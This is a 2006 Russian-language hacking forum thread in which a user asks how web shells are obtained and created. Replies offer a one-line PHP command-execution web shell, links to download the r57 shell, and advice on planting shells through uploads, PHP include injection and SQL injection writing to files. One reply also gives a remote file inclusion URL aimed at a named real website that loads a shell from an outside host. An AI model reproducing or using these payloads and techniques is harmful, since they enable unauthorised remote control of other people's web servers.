PDA

Просмотр полной версии : Помогите

A.R.S.
17.04.2006, 13:41
Здравствуйте
Помогите мне пожалуйста и расскажите как и откуда берутся шелы.
заранее спасибо
Utochka
17.04.2006, 13:53
Шеллы с небес бог посылает или добрые люди на форуме выкладывают, либо ты сам баги ищеш shell туды заливаешь.Еще как вариан с помощью дяденьки google можно поискать.
A.R.S.
18.04.2006, 00:15
не ну правда как создать свой шелл и что для этого нужно
Sw%00p
18.04.2006, 00:41
не ну правда как создать свой шелл и что для этого нужно

опять я за совё пхп и перловка
ну мона асп ну короче на всём хоть на бейсике
H0ak1N
18.04.2006, 00:44
не ну правда как создать свой шелл и что для этого нужно
скачай в инете чей-нибудь троян-бэкдор, запусти и будет у кого-то шелл :D

а вообще надо поиском пользоваться.
читай тут например http://forum.antichat.ru/showpost.php?p=136113&postcount=9
они разные бывают, иногда слово "шелл" носит в себе нарицательный характер в разговорной форме. Например: "сделал шелл" т.е на захваченном компе установил backdoor по которому можно удалённо пользоваться системой вне поле зрения владельца :)
A110ut
18.04.2006, 00:49
<?php if(@$c)system($c);?>
держи. потренируйся.. авось получим аналог r57 =)
Sw%00p
18.04.2006, 00:53
Здравствуйте
Помогите мне пожалуйста и расскажите как и откуда берутся шелы.
заранее спасибо
хошь я те свой шелл пришли правда на стадии разработок но пашет мощьно

не уступает самому р57
vectorg
18.04.2006, 00:59
1. шелл создавать не нужно, уже есть готовые:
а) http://rst.void.ru/download/r57shell.txt
б) http://nst.void.ru/?q=releases&download=6
etc...
вот статья про шеллы и что это вообще такое:
http://optics.org.ua/Aboutshell.rar

2. Чтобы использовать шелл, нужно чтобы его код исполнился на уязвимой системе... Этого можно достичь обычно двумя способами:
а) залить его каким либо способом (ftp или через веб) и открыть в браузере =)
б) ипользовать уязвимости в коде: php injection (обычно банальный include() ), либо sql injection (обычно into file), где шелл заливать не нужно, его код берётся из вне

3. Чтобы найти уязвимые скрипты, нужно:
а) пользоваться ПОИСКОМ и смотреть сайты в моей подписи
б) использовать google, со специальными запросами (ищи и всё найдёшь! ;) )
в) щупать самому :)

p.s.

пример php injection - _http://www.the-loan-center.net/sphider/admin/configset.php?settings_dir=http://rst.void.ru/download/r57shell.txt?

p.p.s

могу писать бред, т.к. нахожусь в "неадекватном" состоянии :p
A110ut
18.04.2006, 00:59
не уступает самому р57
меня терзают смутные сомнения...
Sw%00p
18.04.2006, 01:10
меня терзают смутные сомнения...

да я тя понял скажешь что я у них всё переписал

есть пословица

до чего додумался один человек додумается и второй

и порой пхп не р57 создал
vectorg
18.04.2006, 01:17
мля, задолбали флудить!
для всех вопросов и обсуждений не по теме есть: мыло, личка, ася etc...
считаю что этот и предыдущие 2 поста могут быть удалены...